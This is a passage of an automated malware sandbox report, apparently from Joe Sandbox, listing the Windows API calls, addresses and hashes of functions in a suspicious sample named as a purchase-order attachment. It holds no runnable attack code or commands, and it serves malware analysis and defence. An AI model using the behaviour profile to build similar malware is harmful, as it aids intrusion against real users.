                                                    • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                    • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                    • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                    • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ClearErrorInitLast
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 3207048006-625585964
                                                    • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                    • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                    • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                    • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                    • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                    • gethostbyname.WSOCK32(?), ref: 004655A6
                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                    • _memmove.LIBCMT ref: 004656CA
                                                    • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                    • WSACleanup.WSOCK32 ref: 00465762
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                    • String ID:
                                                    • API String ID: 2945290962-0
                                                    • Opcode ID: 861621b3bc9d23e299d0c06e3d54db9a70791c433b129c8d2c46b05cd3269fa8
                                                    • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                    • Opcode Fuzzy Hash: 861621b3bc9d23e299d0c06e3d54db9a70791c433b129c8d2c46b05cd3269fa8
                                                    • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                    • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                    • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                    • String ID:
                                                    • API String ID: 1457242333-0
                                                    • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                    • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                    • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                    • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 15295421-0
                                                    • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                    • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                    • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                    • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcstok.LIBCMT ref: 004675B2
                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                    • _wcscpy.LIBCMT ref: 00467641
                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                    • _wcslen.LIBCMT ref: 00467793
                                                    • _wcslen.LIBCMT ref: 004677BD
                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                    • String ID: X
                                                    • API String ID: 780548581-3081909835
                                                    • Opcode ID: ab3353adf0956d925bd975f00f8df7eaf7e48b8e66d8313764f4eb82a7cbaf75
                                                    • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                    • Opcode Fuzzy Hash: ab3353adf0956d925bd975f00f8df7eaf7e48b8e66d8313764f4eb82a7cbaf75
                                                    • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                    • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                    • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                    • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                    • CloseFigure.GDI32(?), ref: 0044751F
                                                    • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                    • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                    • String ID:
                                                    • API String ID: 4082120231-0
                                                    • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                    • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                    • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                    • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                    • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                    • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 2027346449-0
                                                    • Opcode ID: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                    • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                    • Opcode Fuzzy Hash: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                    • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • GetMenu.USER32 ref: 0047A703
                                                    • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                    • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                    • _wcslen.LIBCMT ref: 0047A79E
                                                    • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                    • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                    • String ID:
                                                    • API String ID: 3257027151-0
                                                    • Opcode ID: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                    • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                    • Opcode Fuzzy Hash: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                    • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                    APIs
                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastselect
                                                    • String ID:
                                                    • API String ID: 215497628-0
                                                    • Opcode ID: 27f3caf576fa04a51084173f6f41f43a735bca6a6c84800b6e7be26a8621371d
                                                    • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                    • Opcode Fuzzy Hash: 27f3caf576fa04a51084173f6f41f43a735bca6a6c84800b6e7be26a8621371d
                                                    • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                    APIs
                                                    • GetParent.USER32(?), ref: 0044443B
                                                    • GetKeyboardState.USER32(?), ref: 00444450
                                                    • SetKeyboardState.USER32(?), ref: 004444A4
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                    • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                    • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                    • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00444633
                                                    • GetKeyboardState.USER32(?), ref: 00444648
                                                    • SetKeyboardState.USER32(?), ref: 0044469C
                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                    • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                    • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                    • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                    APIs
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                    • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                    • String ID:
                                                    • API String ID: 2354583917-0
                                                    • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                    • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                    • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                    • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                    • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                    • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$FreeLoad
                                                    • String ID: v
                                                    • API String ID: 2449869053-2904040280
                                                    • Opcode ID: edca6472ef0d27ee7e2f9b628ab7156cf8e4f7811a7febfc4905c6c59bc609c9
                                                    • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                    • Opcode Fuzzy Hash: edca6472ef0d27ee7e2f9b628ab7156cf8e4f7811a7febfc4905c6c59bc609c9
                                                    • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
